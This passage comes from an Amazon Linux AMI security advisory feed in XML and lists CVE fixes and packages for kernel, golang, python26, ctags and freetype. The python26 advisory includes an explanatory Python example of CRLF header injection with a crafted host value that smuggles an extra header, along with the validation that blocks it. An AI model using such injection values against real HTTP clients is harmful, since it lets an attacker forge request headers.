arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.618.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.618.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.618.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.618.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1971</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1971: important priority package 
update for golang</title><issued date="2025-04-09 20:55:00" /><updated date="2025-04-17 11:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-34156:
Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34156" title="" id="CVE-2024-34156" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-misc" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.23.7" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.23.7-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.23.7" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.23.7-1.50.amzn1.noarch.rpm</filename></package><package name="golang" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.23.7-1.50.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.23.7-1.50.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.23.7" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.23.7-1.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1972</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1972: medium priority package update for python26</title><issued date="2025-04-23 21:11:00" /><updated date="2025-04-29 21:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-20907:
A flaw was found in python. In Lib/tarfile.py an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
CVE-2019-18348:
A CRLF injection flaw was discovered in python in the way URLs are handled when doing an HTTP/HTTPS connection (e.g. through urlopen() or HTTPConnection). An attacker who can control the url parameter passed to the urlopen() method in the urllib/urllib2 modules can inject CRLF sequences and HTTP headers by abusing the "host" part of the URL.
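The injection works because a client that copies the host component of the URL straight into the Host header lets an embedded CR LF end that header line and start a new, attacker-chosen one. The following added example (written for this advisory in Python 3, not CPython's http.client code; the function names are hypothetical) builds the request head the way a naive client would, shows what the server sees when the host carries a CRLF, and applies the control-character check on the host that closes the hole.

```python
import re

# Control characters (including CR and LF) have no place in a hostname; any
# of them could terminate the Host header early.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


class InvalidURL(ValueError):
    """Raised when a host component could split the request into extra headers."""


def validate_host(host):
    """Reject a host string containing control characters."""
    if _CONTROL_CHARS.search(host):
        raise InvalidURL("URL can't contain control characters in host: %r" % host)
    return host


def build_request_head(host, path="/", validate=True):
    """Return the request line plus Host header as they would hit the wire.

    validate=False reproduces the vulnerable behaviour: the host is copied
    into the header unchecked.
    """
    if validate:
        host = validate_host(host)
    return ("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (path, host)).encode("latin-1")


def header_names(raw_head):
    """List the header names a server parsing raw_head would see."""
    head, _, _ = raw_head.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")[1:]  # drop the request line
    return [line.split(b":", 1)[0].decode("latin-1") for line in lines if line]


def host_is_rejected(host):
    """True if validate_host refuses host."""
    try:
        validate_host(host)
    except InvalidURL:
        return True
    return False


# Constructed attacker-controlled host: a CRLF followed by a forged header.
EVIL_HOST = "example.com\r\nX-Injected: yes"

if __name__ == "__main__":
    print(header_names(build_request_head("example.com")))
    print(header_names(build_request_head(EVIL_HOST, validate=False)))
    print("evil host rejected:", host_is_rejected(EVIL_HOST))
```

With validation off the server sees two headers, Host and X-Injected, from what the application believed was a single hostname; with validation on the request is never built. The same check belongs on every URL component that is copied into the request line or headers, not only the host.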
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20907" title="" id="CVE-2019-20907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.92.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.92.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-devel-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.92.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.92.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1973</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1973: important priority package update for kernel</title><issued date="2025-04-23 22:12:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21991:
In the Linux kernel, the following vulnerability has been resolved:
x86/microcode/AMD: Fix out-of-bounds on systems with CPU-less NUMA nodes
CVE-2025-21858:
In the Linux kernel, the following vulnerability has been resolved:
geneve: Fix use-after-free in geneve_find_dev().
CVE-2025-21796:
In the Linux kernel, the following vulnerability has been resolved:
nfsd: clear acl_access/acl_default after releasing them
CVE-2025-21791:
In the Linux kernel, the following vulnerability has been resolved:
vrf: use RCU protection in l3mdev_l3_out()
CVE-2025-21759:
In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: extend RCU protection in igmp6_send()
CVE-2024-50301:
In the Linux kernel, the following vulnerability has been resolved:
security/keys: fix slab-out-of-bounds in key_task_permission
CVE-2024-50278:
In the Linux kernel, the following vulnerability has been resolved:
dm cache: fix potential out-of-bounds access on the first resume
CVE-2024-50036:
In the Linux kernel, the following vulnerability has been resolved:
net: do not delay dst_entries_add() in dst_release()
CVE-2024-49882:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix double brelse() the buffer of the extents path
CVE-2024-47745:
In the Linux kernel, the following vulnerability has been resolved:
mm: call the security_mmap_file() LSM hook in remap_file_pages()
CVE-2023-52975:
In the Linux kernel, the following vulnerability has been resolved:
scsi: iscsi_tcp: Fix UAF during logout when accessing the shost ipaddress
CVE-2023-39189:
nftables out-of-bounds read in nf_osf_match_one()
CVE-2023-1611:
A use-after-free flaw was found in btrfs_search_slot in fs/btrfs/ctree.c in btrfs in the Linux Kernel. This flaw allows an attacker to crash the system and possibly cause a kernel information leak.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1611" title="" id="CVE-2023-1611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39189" title="" id="CVE-2023-39189" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52975" title="" id="CVE-2023-52975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47745" title="" id="CVE-2024-47745" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49882" title="" id="CVE-2024-49882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50036" title="" id="CVE-2024-50036" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50278" title="" id="CVE-2024-50278" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50301" title="" id="CVE-2024-50301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21759" title="" id="CVE-2025-21759" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21791" title="" id="CVE-2025-21791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21796" title="" id="CVE-2025-21796" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21858" title="" id="CVE-2025-21858" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21991" title="" id="CVE-2025-21991" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.639.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" 
release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.639.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.639.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.639.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1974</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1974: important priority package update for ctags</title><issued date="2025-04-23 22:12:00" /><updated date="2025-04-29 21:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4515:
A flaw was found in Exuberant Ctags in the way it handles the "-o" option. This option specifies the tag filename. A crafted tag filename specified in the command line or in the configuration file results in arbitrary command execution because the externalSortTags() in sort.c calls the system(3) function in an unsafe way.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4515" title="" id="CVE-2022-4515" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctags-etags" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-etags-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags-debuginfo" version="5.8" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctags-debuginfo-5.8-2.7.amzn1.x86_64.rpm</filename></package><package name="ctags-etags" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-etags-5.8-2.7.amzn1.i686.rpm</filename></package><package name="ctags-debuginfo" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-debuginfo-5.8-2.7.amzn1.i686.rpm</filename></package><package name="ctags" version="5.8" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/ctags-5.8-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1975</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1975: important priority package update for kernel</title><issued date="2025-04-23 22:37:00" /><updated date="2025-05-21 21:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-52973:
In the Linux kernel, the following vulnerability has been resolved:
vc_screen: move load of struct vc_data pointer in vcs_read() to avoid UAF
CVE-2023-52845:
In the Linux kernel, the following vulnerability has been resolved:
tipc: Change nla_policy for bearer-related names to NLA_NUL_STRING
CVE-2023-3567:
A use-after-free flaw was found in vcs_read in drivers/tty/vt/vc_screen.c in vc_screen in the Linux Kernel. An attacker with local user access could use this flaw to cause a system crash or a leak of internal kernel information.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3567" title="" id="CVE-2023-3567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52845" title="" id="CVE-2023-52845" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52973" title="" id="CVE-2023-52973" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.330-176.540.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.330" 
release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.330-176.540.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.330" release="176.540.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.330-176.540.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1976</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1976: important priority package update for freetype</title><issued date="2025-05-08 22:24:00" /><updated date="2025-05-12 13:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-27363:
An out of bounds write exists in FreeType versions 2.13.0 and below when attempting to parse font subglyph structures related to TrueType GX and variable font files. The vulnerable code assigns a signed short value to an unsigned long and then adds a static value causing it to wrap around and allocate too small of a heap buffer. The code then writes up to 6 signed long integers out of bounds relative to this buffer. This may result in arbitrary code execution. This vulnerability may have been exploited in the wild.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27363" title="" id="CVE-2025-27363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freetype-demos" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-demos-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-debuginfo-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-devel-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype" version="2.3.11" release="19.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freetype-2.3.11-19.17.amzn1.x86_64.rpm</filename></package><package name="freetype-debuginfo" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-debuginfo-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype-devel" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-devel-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype-demos" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-demos-2.3.11-19.17.amzn1.i686.rpm</filename></package><package name="freetype" version="2.3.11" release="19.17.amzn1" epoch="0" arch="i686"><filename>Packages/freetype-2.3.11-19.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1977</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1977: important priority package update for kernel</title><issued date="2025-05-08 22:29:00" /><updated date="2025-05-12 13:41:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21920:
In the Linux kernel, the following vulnerability has been resolved:
vlan: enforce underlying device type
CVE-2022-49465:
In the Linux kernel, the following vulnerability has been resolved:
blk-throttle: Set BIO_THROTTLED when bio has been throttled
CVE-2022-49413:
In the Linux kernel, the following vulnerability has been resolved:
bfq: Update cgroup information before merging bio
CVE-2022-49168:
In the Linux kernel, the following vulnerability has been resolved:
btrfs: do not clean up repair bio if submit fails
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49168" title="" id="CVE-2022-49168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49413" title="" id="CVE-2022-49413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49465" title="" id="CVE-2022-49465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21920" title="" id="CVE-2025-21920" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" 
release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.643.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.643.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.643.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.643.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.643.amzn1.i686.rpm</filename></package><package 
